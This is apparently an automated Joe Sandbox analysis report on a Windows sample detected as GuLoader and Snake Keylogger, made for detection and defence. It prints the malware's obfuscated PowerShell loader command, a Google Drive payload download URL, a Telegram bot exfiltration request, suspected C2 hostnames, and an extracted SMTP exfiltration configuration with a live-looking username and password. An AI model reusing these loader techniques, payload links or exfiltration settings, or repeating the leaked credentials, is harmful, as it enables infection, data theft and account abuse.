Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe

Overview

General Information

Sample name:#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
renamed because original name is a hash value
Original sample name:-SUPERLEON NOVIEMBR.exe
Analysis ID:1559209
MD5:39550a5532af152df27a096508a0d4e2
SHA1:45317173c2771b28460dc4a473c2532983977de1
SHA256:41b359e55e25d9f92e6f4ea1b88b3cfe7c6ca962075a60ac9417548ad190c41e
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe" MD5: 39550A5532AF152DF27A096508A0D4E2)
    • powershell.exe (PID: 6880 cmdline: "powershell.exe" -windowstyle minimized "$Havegrund=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro';$Enmotoret=$Havegrund.SubString(14070,3);.$Enmotoret($Havegrund)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 2500 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "geles.garcia@socage.es", "Password": "SOCAG3_314$%]", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2050571503.000000000962C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 2500JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 2500JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.23.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2500, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49971
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6880, TargetFilename: C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Havegrund=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro';$Enmotoret=$Havegrund.SubString(14070,3);.$Enmotoret($Havegrund)" , CommandLine: "powershell.exe" -windowstyle minimized "$Havegrund=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro';$Enmotoret=$Havegrund.SubString(14070,3);.$Enmotoret($Havegrund)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe", ParentImage: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe, ParentProcessId: 7104, ParentProcessName: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Havegrund=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro';$Enmotoret=$Havegrund.SubString(14070,3);.$Enmotoret($Havegrund)" , ProcessId: 6880, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-20T10:10:52.893472+010028033053Unknown Traffic192.168.2.749975188.114.96.3443TCP
          2024-11-20T10:10:54.026390+010028033053Unknown Traffic192.168.2.749977188.114.96.3443TCP
          2024-11-20T10:10:55.140126+010028033053Unknown Traffic192.168.2.749979188.114.96.3443TCP
          2024-11-20T10:11:02.291271+010028033053Unknown Traffic192.168.2.749984188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-20T10:10:43.536222+010028032742Potentially Bad Traffic192.168.2.749973193.122.130.080TCP
          2024-11-20T10:10:47.947108+010028032742Potentially Bad Traffic192.168.2.749973193.122.130.080TCP
          2024-11-20T10:10:51.096264+010028032742Potentially Bad Traffic192.168.2.749973193.122.130.080TCP
          2024-11-20T10:10:52.341659+010028032742Potentially Bad Traffic192.168.2.749973193.122.130.080TCP
          2024-11-20T10:10:53.435578+010028032742Potentially Bad Traffic192.168.2.749976193.122.130.080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-20T10:10:37.128035+010028032702Potentially Bad Traffic192.168.2.749971172.217.23.110443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "geles.garcia@socage.es", "Password": "SOCAG3_314$%]", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeReversingLabs: Detection: 15%
          Multi AV Scanner detection for submitted file
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeReversingLabs: Detection: 15%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49974 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.7:49971 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49972 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49985 version: TLS 1.2
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2049185067.0000000008187000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000002.00000002.2042052981.0000000007081000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02E3F2EDh14_2_02E3F3BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02E3F2EDh14_2_02E3F33C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02E3F2EDh14_2_02E3F150
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02E3FAA9h14_2_02E3F7F1

          Networking

          barindex
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:33:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49976 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49973 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49977 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49984 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49971 -> 172.217.23.110:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49979 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49975 -> 188.114.96.3:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49974 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:33:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 09:11:03 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe, #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2036575902.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2036575902.0000000004881000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.2036575902.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2036575902.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: msiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 0000000E.00000002.2542418088.0000000023285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
          Source: msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 0000000E.00000002.2542418088.000000002332A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002331B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 0000000E.00000002.2542418088.000000002331B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enX
          Source: msiexec.exe, 0000000E.00000002.2542418088.0000000023325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: powershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 0000000E.00000002.2530341209.000000000765A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 0000000E.00000002.2530341209.000000000765A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/d8
          Source: msiexec.exe, 0000000E.00000002.2541539304.0000000022680000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2530341209.000000000765A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK
          Source: msiexec.exe, 0000000E.00000002.2530341209.00000000076BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2198114820.00000000076D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2198114820.00000000076D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK&export=download
